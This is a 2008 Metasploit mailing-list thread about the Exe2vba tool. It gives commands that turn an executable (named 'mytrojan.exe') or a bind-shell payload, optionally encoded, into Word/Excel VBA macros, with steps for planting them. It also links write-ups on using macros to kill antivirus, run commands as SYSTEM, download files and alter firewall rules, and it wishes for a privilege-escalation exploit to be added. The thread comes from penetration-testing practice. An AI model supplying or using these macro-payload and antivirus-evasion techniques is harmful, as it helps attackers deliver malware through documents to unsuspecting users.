Metasploit mailing list archives
Fwd: Exe2vba - Anybody still have this?
From: natron at invisibledenizen.org (natron)
Date: Mon, 17 Nov 2008 10:27:46 -0600
In case anyone finds this type of thing helpful, here are a series of posts showing how to use VBA to perform various actions, like kill AV, modify the windows firewall, or download files. Useful to Kill AV, then unpack an msf payload that might trigger antivirus as soon as it's written to the hard drive, but before it's able to execute.

n

---------- Forwarded message ----------
From: natron <natron at invisibledenizen.org>
Date: Sun, Nov 16, 2008 at 8:50 PM
Subject: Re: Exe2vba - Anybody still have this?
To: H D Moore <sflist at digitaloffense.net>, pen-test at securityfocus.com, Joseph McCray <joe at learnsecurityonline.com>

I wrote up a quick series of posts on how to use VBA to do all kinds of things, as long as the user running the Excel/Word file has the necessary rights. If anyone would find them useful:

Running commands or launching programs:
http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html

Downloading files and saving them to disk:
http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html

Running commands as SYSTEM:
http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

Killing off any antivirus that may be running:
http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html

Modifying the Windows Firewall:
http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html

What I would really love to see would be a combination of the Churrasco exploit (http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html) into VBA, so that even if the user is running in a limited account, they'd be able to gain SYSTEM privileges.

-n

On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist at digitaloffense.net> wrote:
> Hi Joseph,
>
> I added this to Metasploit. You can use the VBA generator in a few different ways:
>
> 1) Convert an EXE to a VBA script (works on Word/Excel automatically):
>
>    $ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba
>
> 2) Create a VBA script that runs a Metasploit payload
>
>    $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba
>
> 3) Create a VBA script that runs an encoded Metasploit payload
>
>    $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
>      ruby msf3/msfencode -a x86 -b '' -t vba > output.vba
>
> To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual Basic Editor, paste in, save, and exit. Works pretty well here :-)
>
> You need the latest SVN of Metasploit 3.2 trunk:
>
>    $ svn co http://metasploit.com/svn/framework3/trunk/
>
> On Windows, follow this guide:
> - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN
>
> -HD
>
> On Tuesday 11 November 2008, Joseph McCray wrote:
>> It used to be located at:
>> http://www.priestmaster.org/tools.html
>>
>> I've been looking all over the web and really haven't been able to find this app anymore.